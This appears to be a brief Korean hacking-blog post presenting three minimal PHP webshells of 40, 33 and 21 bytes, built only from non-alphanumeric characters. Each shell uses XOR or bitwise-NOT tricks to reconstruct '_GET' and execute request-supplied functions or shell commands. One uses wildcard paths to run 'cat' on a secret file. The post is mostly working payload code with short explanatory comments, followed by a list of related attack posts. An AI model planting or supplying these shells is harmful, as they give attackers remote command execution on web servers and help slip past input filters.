-
Only 특수문자 웹쉘(WebShell)HACK/WEB 2018. 7. 17. 18:18
40byte WebShell(only Non-alphanumeric)
/* *** Substitution *** * '$<>/'^'{{{{' => '_GET' * ${$_}[_](${$_}[__]) => ${'_GET'}[_](${'_GET'}[__]) * *** Final *** * <?=$_GET[_]($_GET[__]) */ <?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
33byte WebShell(only Non-alphanumeric)
<?=`/???/??? ../??????.??? > ===` // ex) /bin/cat ../secret.php > ===
21byte WebShell(only Non-alphanumeric)
<?=`{${~"����"}[_]}`; // echo -ne '<?=`{${~"\xa0\xb8\xba\xab"}[_]}`;' // ~"\xa0\xb8\xba\xab" => _GET
Reference
'HACK > WEB' 카테고리의 다른 글
Oracle SQLi with XXE (0) 2019.04.18 Thread Requests Example (0) 2018.11.07 SQLite 테이블, 컬럼 정보 가져오기 (0) 2018.08.09 PROCEDURE ANALYSE - SQLi (0) 2018.08.03 JavaScript - CSRF (0) 2018.07.18